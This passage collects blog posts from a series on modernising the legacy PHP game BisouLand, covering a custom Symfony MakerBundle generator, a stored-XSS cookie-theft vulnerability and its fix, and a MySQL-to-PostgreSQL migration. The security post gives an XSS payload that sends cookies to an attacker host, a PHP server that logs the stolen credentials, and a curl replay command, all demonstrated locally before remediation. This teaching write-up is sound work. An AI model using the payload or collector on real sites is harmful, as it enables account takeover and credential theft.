--parameter="password:string:8-72 characters" \
--action=SignUpNewPlayer \
--action=SignInPlayer'
The generated scenario handler comes pre-wired with SignUpNewPlayerHandler and
SignInPlayerHandler as constructor dependencies, their namespaces already imported.
Building a MakerBundle command means extending AbstractMaker and implementing three
methods: configureCommand() for option declarations, interact() for the interactive
prompts, and generate() for file generation via the Generator service. The
generate() method is a flat list of generateClass() calls, one per file:
public function generate(InputInterface $input, ConsoleStyle $io, Generator $generator): void
{
// ... resolve variables from input ...
// 1. Action input DTO
$generator->generateClass(
"Bl\\Qa\\Application\\Action\\{$actionName}\\{$actionName}",
"{$templateDir}/Qalin/Action/HandlerInput.tpl.php",
$variables,
);
// 2. Action handler
$generator->generateClass(
"Bl\\Qa\\Application\\Action\\{$actionName}\\{$actionName}Handler",
"{$templateDir}/Qalin/Action/Handler.tpl.php",
$variables,
);
// ... 10 more files: output DTO, CLI command, Web controller, API controller,
// Twig template, spec tests, integration tests ...
$generator->writeChanges();
}
Templates are plain PHP files that echo the target source. The API controller template, for instance, reproduces exactly the class pattern shown earlier in this article:
<?php echo "<?php\n"; ?>
declare(strict_types=1);
namespace <?php echo $namespace; ?>;
use Bl\Qa\Application\Action\<?php echo $action_name; ?>\<?php echo $action_name; ?>;
use Bl\Qa\Application\Action\<?php echo $action_name; ?>\<?php echo $action_name; ?>Handler;
use Symfony\Component\HttpFoundation\JsonResponse;
use Symfony\Component\HttpFoundation\Response;
use Symfony\Component\HttpKernel\Attribute\MapRequestPayload;
use Symfony\Component\Routing\Attribute\Route;
final readonly class <?php echo $class_name; ?>
{
public function __construct(
private <?php echo $action_name; ?>Handler $<?php echo $action_camel; ?>Handler,
) {
}
#[Route('/api/v1/actions/<?php echo $action_kebab; ?>', methods: ['POST'])]
public function __invoke(
#[MapRequestPayload]
<?php echo $action_name; ?> $<?php echo $action_camel; ?>,
): JsonResponse {
$<?php echo lcfirst($action_output_name); ?> = $this-><?php echo $action_camel; ?>Handler->run($<?php echo $action_camel; ?>);
return new JsonResponse(
json_encode($<?php echo lcfirst($action_output_name); ?>->toArray(), \JSON_THROW_ON_ERROR),
Response::HTTP_CREATED,
json: true,
);
}
}
The result is a generator that knows your project's conventions as well as you do.
🎶 Modern Symfony: MakerBundle is best known for generating controllers, entities, and form types, but its real power is that it is extensible. Any repetitive file structure in your project, a command handler pair, an event with its listener, a domain object with its repository and tests, is a candidate for a custom maker. The API is straightforward, the templates are plain PHP, and the payoff compounds every time a new developer joins the project and generates their first file in seconds rather than copy-pasting for an hour.
BisouLand is a 2005 LAMP application with no test harness, no clean architecture.
Rather than fighting that, I built a separate Symfony 8 application alongside it: a Test Control Interface that anyone on the team can use to reach any game state in seconds.
This is not new. Bumble has been running QAAPI since 2013 across a much larger codebase, used by every role from developer to QA to designer. The idea translates cleanly to any stack.
What Symfony 8 brings is that the boilerplate cost is near zero:
#[AsCommand], #[Argument], #[Option] replace configure() and execute()#[Route] and #[MapRequestPayload] replace manual deserialization and validationreadonly classes keep handlers and DTOs conciseAdding a new action to Qalin takes minutes, not hours. The generated code is consistent, tested, and immediately usable from the terminal, the web UI, or a PHPUnit test.
Want to learn more?
Qalin went from zero to usable in two weeks. One thing worth exploring in a future iteration is self-documenting input DTOs.
In QAAPI, a method is self-describing: getDescription() documents the method itself,
and each parameter is declared via a builder that carries its own description:
'seconds' => \QAAPI\Params\PositiveInteger::create()
->setDescription('Offset in seconds'),
In Qalin, the input DTO is a plain readonly class. The parameter descriptions live
only in the MakerBundle invocation, then get scattered across #[Argument] and
#[Option] attributes in the CLI command. They are not available to the web template,
where a tooltip next to each field would meaningfully improve usability.
A natural starting point would be a getDescription() method on the input DTO, and
custom PHP attributes to carry per-parameter metadata:
#[ActionDescription('Instantly upgrade an upgradable for free')]
final readonly class UpgradeInstantlyForFree
{
public function __construct(
#[ParameterDescription('an existing username')]
public string $username,
#[ParameterDescription('heart, mouth, legs, etc')]
public string $upgradable,
#[ParameterDescription('how many levels to upgrade at once')]
public int $levels = 1,
) {
}
}
That metadata could then be read via reflection and surfaced in the web template as
tooltips, and injected into --help output on the CLI.
The trade-off is that building CLI commands dynamically from DTO metadata means giving
up #[Argument] and #[Option] on __invoke(). The command would go back to
configure() and execute(), constructed at runtime from reflected attributes rather
than declared statically. That is perfectly fine: #[Argument] and #[Option] shine
for the common case, lowering the bar for anyone writing their first command. When
requirements grow more dynamic, the traditional API is still there, just as capable.
The new attributes and the old approach are not in competition; they serve different
needs, and Symfony giving us both is the point.
🤘 Awakened by the sins of forgotten sanitization, the Cookie Burglar breaches the walls of client-side trust, stealing credentials from the altar of the Script Injector with its serpentine payloads! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:43000/), and have some level of automated tests.
When migrating from the deprecated PHP extension mysql to PDO,
we were expecting to find some SQL injection vulnerabilities,
as the queries were written by concatenating user input.
But to our surprise, none of these were exploitable,
as the user input was sanitised and validated
(e.g. only 15 alphanumerical characters for the username, addslashes, htmlentities, ...).
Still, following the Secure PHP Database recommendations, we:
In today's article, we'll explore an actually exploitable vulnerability which allows an attacker to steal a victim's credentials and impersonate them.
First we're going to look at different sections of the code.
Let's start with how logging in is handled:
// phpincludes/app.php
// ---------- Visitor Logs in
if ('POST' === $_SERVER['REQUEST_METHOD'] && isset($_POST['connexion'])) {
// Ensuite on vérifie que les variables existent et contiennent quelque chose :)
if (isset($_POST['pseudo'], $_POST['mdp']) && !empty($_POST['pseudo']) && !empty($_POST['mdp'])) {
// Mesure de sécurité, notamment pour éviter les injections sql.
// Le htmlentities évitera de le passer par la suite.
$pseudo = htmlentities((string) $_POST['pseudo']);
$mdp = htmlentities((string) $_POST['mdp']);
// Hashage du mot de passe.
$mdp = md5($mdp);
// ---------- Persist the authentication (cookie creation)
// La requête qui compte le nombre de pseudos
$stmt = $pdo->prepare('SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
// La on vérifie si le nombre est différent que zéro
if (0 != $stmt->fetchColumn()) {
// Sélection des informations.
$stmt = $pdo->prepare('SELECT id, confirmation, mdp, nuage FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
$donnees_info = $stmt->fetch();
if (isset($_POST['auto'])) {
$timestamp_expire = time() + 30 * 24 * 3600;
setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
}
}
}
}
And here's how the cookie based authentication is done:
// phpincludes/app.php
// ---------- Authenticate player (using cookie)
// Si on est pas connecté.
if (false == $_SESSION['logged']) {
$id = 0;
// On récupère les cookies enregistrés chez l'utilisateurs, s'ils sont la.
if (isset($_COOKIE['pseudo']) && isset($_COOKIE['mdp'])) {
$pseudo = htmlentities(addslashes((string) $_COOKIE['pseudo']));
$mdp = htmlentities(addslashes($_COOKIE['mdp']));
// La requête qui compte le nombre de pseudos
$stmt = $pdo->prepare('SELECT COUNT(*) AS nb_pseudo FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
if (0 != $stmt->fetchColumn()) {
// Sélection des informations.
$stmt = $pdo->prepare('SELECT id, confirmation, mdp, nuage FROM membres WHERE pseudo = :pseudo');
$stmt->execute(['pseudo' => $pseudo]);
$donnees_info = $stmt->fetch();
// Si le mot de passe est le même (le mot de passe est déjà crypté).
// Si le compte est confirmé.
if ($donnees_info['mdp'] == $mdp && true === $donnees_info['confirmation']) {
// On modifie la variable qui nous indique que le membre est connecté.
$_SESSION['logged'] = true;
// On créé les variables contenant des informations sur le membre.
$_SESSION['id'] = $donnees_info['id'];
$_SESSION['pseudo'] = $pseudo;
$_SESSION['nuage'] = $donnees_info['nuage'];
$page = 'cerveau';
}
}
}
}
We can already spot some issues here.
First on the list is the following:
$mdp = md5($mdp);
MD5 is a weak password hashing strategy for several reasons:
This means stolen MD5 hashes can be reversed to plain text passwords, allowing attackers to access accounts and potentially other sites where victims reused passwords.
Second on the list are the actual credentials (username and password) being stored in the cookies:
setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
This is fundamentally flawed:
Third on the list is how we set the cookies:
setcookie('pseudo', $pseudo, ['expires' => $timestamp_expire]);
setcookie('mdp', $mdp, ['expires' => $timestamp_expire]);
Here we're leaving the default settings for the following options:
httponly: defaults to false,
which means the cookie can be used by JavaScript scriptssecure: defaults to false,
which means the cookie can be sent over HTTP (as opposed to only be sent through HTTPS)samesite: not set,
which means the cookie can be sent to other sitesLet's resume our review of the code as there's more, especially with the handling of private messages which are stored in the database as follow:
// phpincludes/fctIndex.php
function AdminMP($cible, $objet, $message, bool $lu = false): void
{
$pdo = bd_connect();
$castToPgBoolean = cast_to_pg_boolean();
$castToPgTimestamptz = cast_to_pg_timestamptz();
$message = nl2br((string) $message);
$stmt = $pdo->prepare('SELECT COUNT(*) AS nbmsg FROM messages WHERE destin = :destin');
$stmt->execute(['destin' => $cible]);
$nbmsg = $stmt->fetchColumn();
if ($nbmsg >= 20) {
$Asuppr = $nbmsg - 19;
$stmt = $pdo->prepare(
'DELETE FROM messages'
.' WHERE ('
.' destin = :destin'
." AND timestamp <= CURRENT_TIMESTAMP - INTERVAL '48 hours'"
.' )'
.' ORDER BY id LIMIT :limit',
);
$stmt->execute(['destin' => $cible, 'limit' => $Asuppr]);
}
$timestamp = time();
$stmt = $pdo->prepare(
'INSERT INTO messages'
.' (id, posteur, destin, message, timestamp, statut, titre)'
.' VALUES(:id, :posteur, :destin, :message, :timestamp, :statut, :titre)',
);
$stmt->execute([
'id' => Uuid::v7(),
'posteur' => '00000000-0000-0000-0000-000000000001',
'destin' => $cible,
'message' => $message,
'timestamp' => $castToPgTimestamptz->fromUnixTimestamp($timestamp),
'statut' => $castToPgBoolean->from($lu),
'titre' => $objet],
);
}
And finally when they are displayed, the values from the database are printed directly:
// phpincludes/lire.php
if (true === $_SESSION['logged']) {
$pdo = bd_connect();
$castToUnixTimestamp = cast_to_unix_timestamp();
if (isset($_GET['idmsg']) && !empty($_GET['idmsg'])) {
$idmsg = htmlentities((string) $_GET['idmsg']);
$stmt = $pdo->prepare('SELECT posteur, destin, message, timestamp, statut, titre FROM messages WHERE id = :id');
$stmt->execute(['id' => $idmsg]);
$donnees = $stmt->fetch();
if ($donnees['destin'] == $_SESSION['id']) {
if (false === $donnees['statut']) {
$stmt2 = $pdo->prepare('UPDATE messages SET statut = TRUE WHERE id = :id');
$stmt2->execute(['id' => $idmsg]);
}
$stmt = $pdo->prepare('SELECT pseudo FROM membres WHERE id = :id');
$stmt->execute(['id' => $donnees['posteur']]);
$donnees2 = $stmt->fetch();
$from = $donnees2['pseudo'];
$objet = $donnees['titre'];
$message = $donnees['message'];
$dateEnvoie = $castToUnixTimestamp->fromPgTimestamptz($donnees['timestamp']);
?>
<a href="boite.html" title="Messages">Retour à la liste des messages</a>
<br />
<p>Auteur : <?php echo stripslashes((string) $from); ?></p>
<p>Envoyé le <?php echo date('d/m/Y à H\hi', $dateEnvoie); ?></p>
<p>Objet : <?php echo stripslashes((string) $objet); ?></p>
Message :<br />
<div class="message"><?php echo bbLow($message); ?></div>
There's one last problematic issue with the code above.
Last, but certainly not least. We can see in AdminMP() that private messages are stored
in the database without any validation or sanitization.
This allows players to write malicious code (HTML, JavaScript) in their message, which will then be permanently stored.
When they are displayed, these messages are again printed as is straight from the database, without sanitization, which means that any malicious code (HTML, JavaScript) will be displayed and executed.
This opens the door to Cross Site Scripting (XSS) attacks.
Security Vulnerabilities have been found, but can they actually be used?
Given the lack of httponly, secure and samesite options,
it should be possible to obtain the credentials
(and that's without physical access to the computer!).
Let's demonstrate how the attack can be executed in 4 steps:
Here's an example of message an attacker can craft:
ALL YOUR BASE ARE BELONG TO US
<img src=x onerror="new Image().src='http://localhost:8080/steal?c='+document.cookie">
HAHAHA
The onerror attribute will execute the JavaScript when the image fails to load,
and the new Image().src makes an HTTP request with the victim's cookies.

This will happen without the knowledge of the victim!
Here's a demo server we can use to test this:
<?php
/**
* File (for demonstration purpose only): xl-9-attacker-server.php
*
* Receives stolen cookies from payloads injected into the BisouLand messaging system.
* Demonstrates how credentials are exfiltrated via JavaScript in real attack scenarios.
*
* Usage: php -S localhost:8080 xl-9-attacker-server.php
*/
function server_log(string $message): void {
$receivedAt = new \DateTimeImmutable()->format('D M j H:i:s Y');
file_put_contents('php://stderr', "[{$receivedAt}] {$message}\n");
}
// Parse cookies
$cookies = [];
parse_str(str_replace('; ', '&', $_GET['c'] ?? ''), $cookies);
// Display to console
$username = $cookies['pseudo'] ?? '';
$password = $cookies['mdp'] ?? '';
server_log("c is for cookies, that's good enough for me");
server_log(" Username: {$username}");
server_log(" Password: {$password}");
// Send response
http_response_code(204);
The attacker will receive on their server:
[Tue Dec 2 18:11:34 2025] c is for cookies, that's good enough for me
[Tue Dec 2 18:11:34 2025] Username: ln42
[Tue Dec 2 18:11:34 2025] Password: 25d55ad283aa400af464c76d713c07ad
And can use them to access the victim's account:
curl --cookie 'pseudo=ln42; mdp=25d55ad283aa400af464c76d713c07ad' http://localhost:43000/cerveau.html
Now that we've identified the vulnerabilities, let's fix them systematically.
Let's follow the secure PHP Password Hashing recommendations,
which suggest using the password_*() functions available since PHP 5.5.
First in phpincludes/inscription.php,
we'll hash the password with a proper algorithm
(as of PHP 5.5, it's Bcrypt, but might be changed for Argon2 in the future):
- // Hashage du mot de passe avec md5().
- $hmdp = md5($mdp);
+ // Hashage du mot de passe avec Bcrypt ou Argon2.
+ $hmdp = password_hash($mdp, \PASSWORD_DEFAULT);
$id = Uuid::v7();
$stmt = $pdo->prepare(
'INSERT INTO membres (id, pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
.' VALUES (:id, :pseudo, :mdp, :confirmation, CURRENT_TIMESTAMP, CURRENT_TIMESTAMP, :amour)',
);
$stmt->execute([
'id' => $id,
'pseudo' => $pseudo,
'mdp' => $hmdp,
'confirmation' => $castToPgBoolean->from(true),
'amour' => 300,
]);
Then in phpincludes/app.php when the visitor attempts to login,
we use password_verify() to compare the hash stored in the database,
and the plain text password provided:
$mdp = htmlentities((string) $_POST['mdp']);
// Hashage du mot de passe.
- $mdp = md5($mdp);
// Si le mot de passe est le même.
- if ($donnees_info['mdp'] == $mdp) {
+ if (password_verify($mdp, $donnees_info['mdp'])) {
Next, we're going to follow the secure authentication in PHP with long term persistence, which recommend the creation of authentication tokens.
We're going to change the Persist the authentication (cookie creation) section,
replacing it with the creation of an Auth Token which we'll save in the database,
and then store in the cookie:
// ---------- Persist the authentication (cookie creation)
// Instead of counting matches, then selecting pseudonym
// we directly select the account ID
$stmt = $pdo->prepare(<<<'SQL'
SELECT id AS account_id
FROM membres
WHERE pseudo = :pseudonym
SQL);
$stmt->execute(['pseudonym' => $pseudo]);
/**
* @var array<{
* account_id: string, // UUID
* }>|false $account
*/
$account = $stmt->fetch();
if (false !== $account) {
// Using Symfony\Component\Uid\Uuid
// This is the "selector"
$authTokenId = Uuid::v7();
// 32 random hexadecimal characters
// This is stored directly in the cookie
$plainToken = bin2hex(random_bytes(16));
// The hash is stored in the database
// If the table's content is leaked, it won't give what the cookies hold
$tokenHash = hash('sha256', $plainToken);
$expiresAt = new \DateTimeImmutable('+30 days');
$stmt = $pdo->prepare(<<<'SQL'
INSERT INTO auth_tokens
(auth_token_id, token_hash, account_id, expires_at)
VALUES (:auth_token_id, :token_hash, :account_id, :expires_at)
SQL);
$stmt->execute([
'auth_token_id' => $authTokenId,
'token_hash' => $tokenHash,
'account_id' => $account['account_id'],
'expires_at' => $expiresAt->format('Y-m-d\\TH:i:s.uP'),
]);
setcookie(
'bl_auth_token',
"{$authTokenId}:{$plainToken}",
[
'expires' => $expiresAt->getTimestamp(),
// Using safer cookie settings
'httponly' => true,
'secure' => true,
'samesite' => 'Strict',
'path' => '/',
],
);
}
As suggested in the Paragonie article,
we now store in the cookie <authTokenId>:<token>,
this way it no longer contains the username and password,
so obtaining it doesn't compromise the account entirely.
Here's a table to store these:
--------------------------------------------------------------------------------
-- Authentication Tokens
-- Allows secure Authentication Persistence
--------------------------------------------------------------------------------
CREATE TABLE IF NOT EXISTS auth_tokens (
auth_token_id UUID PRIMARY KEY,
token_hash VARCHAR(64) NOT NULL,
account_id UUID NOT NULL REFERENCES membres(id) ON DELETE CASCADE,
created_at TIMESTAMPTZ NOT NULL DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMPTZ NOT NULL DEFAULT CURRENT_TIMESTAMP + '30 days'
);
We also need to replace the entire Authenticate player (using cookie) section,
to check if the cookie is valid we'll need to hash it,
and then compare it to the hash in the database using the "constant-time" hash_equals
if (false === $_SESSION['logged'] && isset($_COOKIE['bl_auth_token'])) {
[$authTokenId, $plainToken] = explode(':', $_COOKIE['bl_auth_token'], 2);
$stmt = $pdo->prepare(<<<'SQL'
SELECT token_hash, account_id
FROM auth_tokens
WHERE auth_token_id = :auth_token_id
AND expires_at > CURRENT_TIMESTAMP
SQL);
$stmt->execute([
'auth_token_id' => $authTokenId,
]);
/** @var array{token_hash: string, account_id: string}|false $authToken */
$authToken = $stmt->fetch();
if (false !== $authToken) {
$tokenHash = hash('sha256', $plainToken);
if (hash_equals($authToken['token_hash'], $tokenHash)) {
// Token is valid, get account details
$stmt = $pdo->prepare(<<<'SQL'
SELECT id, pseudo, nuage
FROM membres
WHERE id = :account_id
SQL);
$stmt->execute([
'account_id' => $authToken['account_id'],
]);
/** @var array{id: string, pseudo: string, nuage: int}|false $account */
$account = $stmt->fetch();
if (false !== $account) {
// On modifie la variable qui nous indique que le membre est connecté.
$_SESSION['logged'] = true;
// On créé les variables contenant des informations sur le membre.
$_SESSION['id'] = $account['id'];
$_SESSION['pseudo'] = $account['pseudo'];
$_SESSION['nuage'] = $account['nuage'];
$page = 'cerveau';
}
}
}
}
Finally, we can fix the XSS vulnerability by escaping the user-generated content, such as the title and message content, before displaying it:
<!-- phpincludes/lire.php -->
<a href="boite.html" title="Messages">Retour à la liste des messages</a>
<br />
<p>Auteur : <?php echo stripslashes((string) $from); ?></p>
<p>Envoyé le <?php echo date('d/m/Y à H\hi', $dateEnvoie); ?></p>
- <p>Objet : <?php echo stripslashes((string) $objet); ?></p>
+ <p>Objet : <?php echo htmlspecialchars(stripslashes((string) $objet), ENT_QUOTES, 'UTF-8'); ?></p>
Message :<br />
- <div class="message"><?php echo bbLow($message); ?></div>
+ <div class="message"><?php echo bbLow(htmlspecialchars($message, ENT_QUOTES, 'UTF-8')); ?></div>
In this article, we've explored a critical vulnerability chain in BisouLand that allowed attackers to steal user credentials through XSS attacks.
The combination of insecure cookie handling (storing plain username and password, missing security flags) and unescaped user-generated content created a perfect storm for account takeover attacks.
The remediation steps we've implemented ensure that:
With these fixes in place, BisouLand is significantly more secure against the most common web application attacks.
]]>⁉️ What do you mean, "how can we test if leaping feature works"?
🤘 The Legacy Executioner casts MySQL into the void of deprecated technologies, summoning PostgreSQL from the northern lands to claim dominion over schemas with its superior type system and extension arsenal! 🔥
In this series, we're dealing with BisouLand, an eXtreme Legacy application (2005 LAMP spaghetti code base). So far, we have:
This means we can run it locally (http://localhost:43000/), and have some level of automated tests.
But it's still using the M in LAMP: MySQL.
Let's migrate to PostgreSQL instead, which provides native support for some interesting types (BOOLEAN, UUID and JSONB):
Let's start by changing the pdo_mysql PHP extension to pdo_pgsql in Dockerfile:
# syntax=docker/dockerfile:1
###
# PHP Dev Container
# Utility Tools: Apache, PHP-FPM, bash, Composer
###
FROM php:8.5-fpm-alpine AS php_dev_container
# Composer environment variables:
# * default user is superuser (root), so allow them
# * put cache directory in a readable/writable location
# _Note_: When running `composer` in container, use `--no-cache` option
ENV COMPOSER_ALLOW_SUPERUSER=1 \
COMPOSER_CACHE_DIR=/tmp/.composer/cache
# Install dependencies:
# * apache: for the webserver
# * bash: for shell access and scripting
# * postgresql: for PDO's SQL queries
# * libzip-dev: for composer packages that use ZIP archives
# _Note (Alpine)_: `--no-cache` includes `--update` and keeps image size minimal
#
# Then install PHP extensions
#
# _Note (Hadolint)_: No version locking, since Alpine only ever provides one version
# hadolint ignore=DL3018
RUN apk add --update --no-cache \
apache2 \
apache2-proxy \
apache2-ssl \
bash \
libzip-dev \
postgresql-dev \
&& sed -i 's/^#LoadModule rewrite_module/LoadModule rewrite_module/' /etc/apache2/httpd.conf \
&& docker-php-ext-install \
pdo_pgsql
# Copy Composer binary from composer image
# _Note (Hadolint)_: False positive as `COPY` works with images too
# See: https://github.com/hadolint/hadolint/issues/197#issuecomment-1016595425
# hadolint ignore=DL3022
COPY --from=composer:2 /usr/bin/composer /usr/bin/composer
WORKDIR /apps/monolith
# Caching `composer install`, as long as composer.{json,lock} don't change.
COPY composer.json composer.lock ./
RUN composer install \
--no-cache \
--no-interaction \
--no-plugins \
--no-scripts \
--optimize-autoloader \
&& chmod -R o+rX vendor/
# Copy Apache configuration
COPY apache-site.conf /etc/apache2/conf.d/bisouland.conf
# Copy the remaining application files (excluding those listed in .dockerignore)
COPY . .
# Configure Apache proxy modules for PHP-FPM
RUN sed -i 's|^#LoadModule proxy_module|LoadModule proxy_module|' /etc/apache2/httpd.conf \
&& sed -i 's|^#LoadModule proxy_fcgi_module|LoadModule proxy_fcgi_module|' /etc/apache2/httpd.conf
# Create startup script to run both PHP-FPM and Apache
RUN echo '#!/bin/sh' > /start.sh \
&& echo 'php-fpm -D' >> /start.sh \
&& echo 'exec httpd -D FOREGROUND' >> /start.sh \
&& chmod +x /start.sh
EXPOSE 80
CMD ["/start.sh"]
Next, we change the image from mysql to postgresql in compose.yaml:
name: bisouland-monolith
services:
web:
build: .
ports:
- "43000:80"
volumes:
- .:/apps/monolith
- vendor:/apps/monolith/vendor
depends_on:
- db
environment:
DATABASE_HOST: ${DATABASE_HOST}
DATABASE_PORT: ${DATABASE_PORT}
DATABASE_USER: ${DATABASE_USER}
DATABASE_PASSWORD: ${DATABASE_PASSWORD}
DATABASE_NAME: ${DATABASE_NAME}
restart: unless-stopped
db:
image: postgres:17
platform: linux/amd64
environment:
POSTGRES_PASSWORD: ${DATABASE_PASSWORD}
POSTGRES_DB: ${DATABASE_NAME}
POSTGRES_USER: ${DATABASE_USER}
volumes:
- postgres_data:/var/lib/postgresql/data
ports:
- "127.0.0.1:43001:5432"
restart: unless-stopped
volumes:
postgres_data:
vendor:
The .env file remains unchanged (we just remove the MYSQL_ROOT_PASSWORD envvar):
# Database
DATABASE_HOST=db
DATABASE_PORT=5432
DATABASE_USER=bisouland
DATABASE_PASSWORD=bisouland_pass
DATABASE_NAME=bisouland
MySQL and PostgreSQL vary in their SQL types and syntax, so a first pass needs to be done to convert the SQL queries, following this table:
| PostgreSQL | MySQL |
|---|---|
| Data Types | |
SERIAL PRIMARY KEY |
INT PRIMARY KEY AUTO_INCREMENT |
INTEGER |
INT |
SMALLINT |
TINYINT(1) |
| SQL Syntax | |
LIMIT 5 OFFSET 0 |
LIMIT 0, 5 |
ON CONFLICT (id) DO UPDATE |
ON DUPLICATE KEY UPDATE |
extract(epoch from now())::integer |
UNIX_TIMESTAMP() |
For example in evo.php:
// On passe à une nouvelle construction si disponible.
- $stmt = $pdo->prepare('SELECT id, duree, type, cout FROM liste WHERE auteur = :auteur AND classe = :classe ORDER BY id LIMIT 0,1');
+ $stmt = $pdo->prepare('SELECT id, duree, type, cout FROM liste WHERE auteur = :auteur AND classe = :classe ORDER BY id LIMIT 1 OFFSET 0');
$stmt->execute(['auteur' => $id, 'classe' => $classeCancel]);
And in schema.sql:
-- Messages table
-- Field order MUST match INSERT statements in fctIndex.php::AdminMP()
CREATE TABLE IF NOT EXISTS messages (
- id INT PRIMARY KEY AUTO_INCREMENT, -- Auto-increment
- posteur INT NOT NULL, -- Matches $source/$expediteur from INSERT
- destin INT NOT NULL, -- Matches $cible from INSERT
+ id SERIAL PRIMARY KEY, -- Auto-increment
+ posteur INTEGER NOT NULL, -- Matches $source/$expediteur from INSERT
+ destin INTEGER NOT NULL, -- Matches $cible from INSERT
message TEXT NOT NULL, -- Matches $message from INSERT
- timestamp INT NOT NULL, -- Matches $timer/time() from INSERT
- statut TINYINT(1) DEFAULT 0, -- Matches '0'/$lu from INSERT
+ timestamp INTEGER NOT NULL, -- Matches $timer/time() from INSERT
+ statut SMALLINT DEFAULT 0, -- Matches '0'/$lu from INSERT
titre VARCHAR(100) NOT NULL -- Matches $titre/$objet from INSERT
);
But PostgreSQL is much more interesting than that.
Some of the MySQL TINYINT actually were boolean, and as it turns out,
PostgreSQL does have a BOOLEAN type:
-- Messages table
-- Field order MUST match INSERT statements in fctIndex.php::AdminMP()
CREATE TABLE IF NOT EXISTS messages (
id SERIAL PRIMARY KEY, -- Auto-increment
posteur INTEGER NOT NULL, -- Matches $source/$expediteur from INSERT
destin INTEGER NOT NULL, -- Matches $cible from INSERT
message TEXT NOT NULL, -- Matches $message from INSERT
timestamp INTEGER NOT NULL, -- Matches $timer/time() from INSERT
- statut SMALLINT DEFAULT 0, -- Matches '0'/$lu from INSERT
+ statut BOOLEAN DEFAULT FALSE, -- (FALSE=unread, TRUE=read)
titre VARCHAR(100) NOT NULL -- Matches $titre/$objet from INSERT
);
Which means we get a PHP bool upon selecting these:
- <td><?php if (0 == $donnees['statut']) {
+ <td><?php if (false === $donnees['statut']) {
echo '<a class="bulle" style="cursor: default;" onclick="return false;" href=""><img src="images/newmess.png" alt="Message non lu" title="" /><span>Message >
}?></td>
But there is a catch: when constructing a query, PDO will not convert PHP bool to PostgreSQL BOOLEAN!
We have to do the PHP bool to PHP string conversion ourselves:
<?php
namespace Bl\Infrastructure\Pg;
class CastToPgBoolean
{
/**
* PostgreSQL's BOOLEAN fields are strings with for values:
* - `true`, `t`, `TRUE`
* - `false`, `f`, `FALSE`
*/
public function from(bool $value): string
{
return $value ? 'TRUE' : 'FALSE';
}
}
And do that before calling PDO:
$stmt = $pdo->prepare(
'INSERT INTO membres (pseudo, mdp, confirmation, timestamp, lastconnect, amour)'
.' VALUES (:pseudo, :mdp, :confirmation, :timestamp, :lastconnect, :amour)',
);
- $stmt->execute(['pseudo' => $pseudo, 'mdp' => $hmdp, 'confirmation' => 1, 'timestamp' => time(), 'lastconnect' => time(), 'amour' => 300]);
+ $stmt->execute(['pseudo' => $pseudo, 'mdp' => $hmdp, 'confirmation' => $castToPgBoolean->from(true), 'amour' => 300]);
If we are not binding parameters, but instead using plain SQL queries, then we can use TRUE and FALSE as follow:
// On supprime les unités.
- $stmt = $pdo->prepare('UPDATE membres SET smack = :smack, baiser = :baiser, pelle = :pelle, bloque = 0 WHERE id = :id');
+ $stmt = $pdo->prepare('UPDATE membres SET smack = :smack, baiser = :baiser, pelle = :pelle, bloque = FALSE WHERE id = :id');
$stmt->execute(['smack' => $AttSmack, 'baiser' => $AttBaiser, 'pelle' => $AttPelle, 'id' => $idAuteur]);
In BisouLand, time and intervals are an essential component of the game: when blowing a kiss, these kisses will take some time to travel to the target, and then as much time to come back.
In 2005 eXtreme Legacy fashion, time was handled as a UNIX timestamp, the number of seconds since January the 1st 1970.
Since PostgreSQL has a TIMESTAMPTZ, which is an actual ISO 8601 date string,
with timezone information, we can take the opportunity to modernise the code:
-- Attack log table
-- Logs completed attacks for rate limiting, INSERT in attaque.php:16, checked in action.php:74
CREATE TABLE IF NOT EXISTS logatt (
id SERIAL PRIMARY KEY, -- Log entry ID
auteur INTEGER NOT NULL, -- Attacker user ID, checked for rate limiting
cible INTEGER NOT NULL, -- Target user ID
- timestamp INTEGER NOT NULL -- Attack completion time, used for 12-hour limit check
+ timestamp TIMESTAMPTZ NOT NULL -- Attack completion time, used for 12-hour limit check
);
We take the opportunity to use PostgreSQL CURRENT_TIMESTAMP function when possible,
and even do INTERVAL calculations:
- $stmt = $pdo->prepare('SELECT COUNT(*) AS nb_att FROM logatt WHERE auteur = :auteur AND cible = :cible AND timestamp >= :timestamp');
- $stmt->execute(['auteur' => $id, 'cible' => $cible, 'timestamp' => time() - 43200]);
+ $stmt = $pdo->prepare("SELECT COUNT(*) AS nb_att FROM logatt WHERE auteur = :auteur AND cible = :cible AND timestamp >= CURRENT_TIMESTAMP - INTERVAL '12 hours'");
+ $stmt->execute(['auteur' => $id, 'cible' => $cible]);
I gotta admit, I'm not ready yet to convert all the UNIX timestamp in the code to DateTime objects,
so we'll have to convert them from PHP int to PHP string in ISO 8601 format:
<?php
namespace Bl\Infrastructure\Pg;
class CastToPgTimestamptz
{
/**
* PostgreSQL's TIMESTAMPTZ fields are strings in (sort of) ISO 8601 date format:
* - '2025-11-20T16:45:03.336548+00:00' (fully ISO 8601 compliant)
* - '2025-11-20 16:45:03+00'
* - '2025-11-20 16:45:03+00:00'
* - '2025-11-20 16:45:03.336548+00'
* - '2025-11-20 16:45:03.336548+00:00'
*/
public function fromUnixTimestamp(int $unixTimestamp): string
{
return new \DateTimeImmutable("@{$unixTimestamp}")->format('Y-m-d\TH:i:s.uP');
}
}
And:
<?php
namespace Bl\Infrastructure\Pg;
class CastToUnixTimestamp
{
/**
* PostgreSQL's TIMESTAMPTZ fields are strings in (sort of) ISO 8601 date format:
* - '2025-11-20T16:45:03.336548+00:00' (fully ISO 8601 compliant)
* - '2025-11-20 16:45:03+00'
* - '2025-11-20 16:45:03+00:00'
* - '2025-11-20 16:45:03.336548+00'
* - '2025-11-20 16:45:03.336548+00:00'
*/
public function fromPgTimestamptz(string $timestamptz): int
{
return new \DateTimeImmutable($timestamptz)->getTimestamp();
}
}
So when interracting with PDO, we do:
- $stmt = $pdo->prepare('INSERT INTO attaque VALUES (:auteur, :cible, :finaller, :finretour, 0)');
